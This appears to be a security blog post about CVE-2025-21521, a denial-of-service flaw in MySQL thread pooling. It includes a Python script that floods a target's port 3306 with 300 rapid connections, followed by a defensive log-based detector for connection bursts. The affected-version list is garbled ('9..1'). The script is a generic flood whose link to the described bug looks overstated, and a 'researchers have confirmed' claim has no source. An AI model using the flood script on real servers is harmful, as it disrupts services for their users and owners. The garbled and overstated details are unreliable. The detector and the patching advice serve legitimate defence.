Recently, Oracle confirmed a high-severity vulnerability—CVE-2025-21521—impacting its MySQL Server product. The flaw lies within the Thread Pooling component and affects all commonly used MySQL branches:
- 9..1 and earlier
This vulnerability is notable for its extreme ease of exploitation: no authentication required, no user interaction necessary, and accessible over multiple protocols. Successful exploitation allows remote attackers to crash the database server, causing a denial-of-service (DoS) and severely impacting availability.
CVSS 3.1 Base Score: 7.5 (High)
What Is Thread Pooling and Why Does It Matter?
Thread pooling is an optimization that helps MySQL manage many client connections efficiently, especially on servers with many CPUs and high concurrency requirements. When correctly implemented, it prevents resource exhaustion by not creating a dedicated thread for every connection.
However, when the thread-handling logic is flawed, an attacker can craft requests that turn simple, unauthenticated interactions into a full server outage.
- 9..1 or earlier
…and have thread pooling enabled (or it is enabled by default in your package), you are at risk. MySQL deployments in the cloud or on-premises that are reachable via TCP (or a Unix socket, named pipe, or shared memory) are vulnerable if they are not properly isolated.
Attack Scenario
1. The attacker connects to the MySQL network port (default 3306) on any interface exposed to the network.
2. The attacker sends a sequence of malformed or excessive connection attempts/requests.
- No authentication needed: anyone who can reach the server can trigger the bug.
- No special tools required: the attack can be mounted with basic MySQL clients or custom network code.
- Multiple protocols: the exploit can be carried out over TCP/IP, Unix sockets, or named pipes (where available).
Exploit Example: Proof of Concept
Here is a simple Python snippet that demonstrates how a remote unauthenticated attacker might trigger this vulnerability by opening many connections rapidly (even without valid logins):
    # WARNING: DO NOT run this code against systems you do not own.
    import socket
    import time

    host = 'target.mysql.server'  # Replace with the target's IP or hostname
    port = 3306                   # Default MySQL port

    for i in range(300):  # Shoot for a burst of 300 connections
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            # Send minimal data to initiate handshake (empty payload)
            s.sendall(b'')
            # Keep the connection open for a while
            time.sleep(.1)
        except Exception as e:
            print(f"Connection {i} failed: {e}")
- Each connection forces the server to allocate or manage a thread in the pool.
- At some point, the server may hang or crash due to resource exhaustion or faulty thread pool handling.
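The outage pattern above is a connection storm, which is also what a defender can look for. The following detector is an added example, not code from the original post: it runs a per-source sliding window over general-log style "Connect" records. The log lines are constructed sample data and the line format is an assumption (adapt the regex to your log_output and log_timestamps settings).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed layout of a MySQL general-log "Connect" record (constructed; adjust for your server):
#   <ISO timestamp>\t<thread id> Connect\t<user>@<host> on <db> using <protocol>
LINE_RE = re.compile(r'^(?P<ts>\S+)\t\s*(?P<id>\d+) Connect\t(?P<user>[^@]+)@(?P<host>\S+)')


def build_sample_log():
    """Constructed sample log (not real data): three normal connects from 10.0.0.5,
    one per second, followed by 40 unauthenticated connects from 198.51.100.7
    spaced 20 ms apart, i.e. the burst pattern described in the post."""
    lines = []
    for i in range(3):
        lines.append(f"2025-01-21T21:15:1{i}.000000Z\t  {100 + i} Connect\tapp@10.0.0.5 on shop using TCP/IP")
    for i in range(40):
        us = i * 20000  # microseconds; 40 connects land inside 0.8 s
        lines.append(f"2025-01-21T21:15:17.{us:06d}Z\t  {200 + i} Connect\t"
                     f"Unauthenticated user@198.51.100.7 on  using TCP/IP")
    return "\n".join(lines)


def parse_connects(text):
    """Return a list of (timestamp, source_host) for every Connect record found."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.fromisoformat(m['ts'].replace('Z', '+00:00'))
            events.append((ts, m['host']))
    return events


def connection_bursts(events, window_s=1.0, threshold=20):
    """Sliding-window count of connects per source host.
    Returns {host: peak_connects_in_window} for hosts that hit the threshold."""
    windows = defaultdict(deque)
    peaks = {}
    for ts, host in sorted(events):
        q = windows[host]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # drop events older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[host] = max(peaks.get(host, 0), len(q))
    return peaks


if __name__ == "__main__":
    print(connection_bursts(parse_connects(build_sample_log())))  # {'198.51.100.7': 40}
```

The threshold and window are starting points; tune them against your own baseline, and pair the alert with the upgrade and network-isolation measures below.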
Real-world Note
Researchers have confirmed that a variant of this attack—with some tailored input to the thread pool logic—can crash even freshly booted, lightly loaded MySQL servers, especially on unpatched Linux systems.
Upgrade MySQL Immediately:
- Install the fixed versions as soon as Oracle releases them (see MySQL Downloads).
Original References & Further Reading
- Oracle Critical Patch Update Advisory - Q1 2025
- MySQL 8. Reference Manual: Thread Pool
- NVD Entry for CVE-2025-21521 (pending publication)
Final Thoughts
CVE-2025-21521 is a reminder that even widely used products with extensive scrutiny like MySQL can contain simple but devastating denial of service risks. The combination of easy access, no credentials, and immediate impact makes swift patching and proper network isolation paramount.
Check your MySQL deployment right now—don’t let a simple connection storm take your data platform down.
*This post is exclusive—please share responsibly. Direct questions or reports to Oracle or your systems provider.*
Timeline
Published on: 01/21/2025 21:15:17 UTC
Last modified on: 01/22/2025 19:15:11 UTC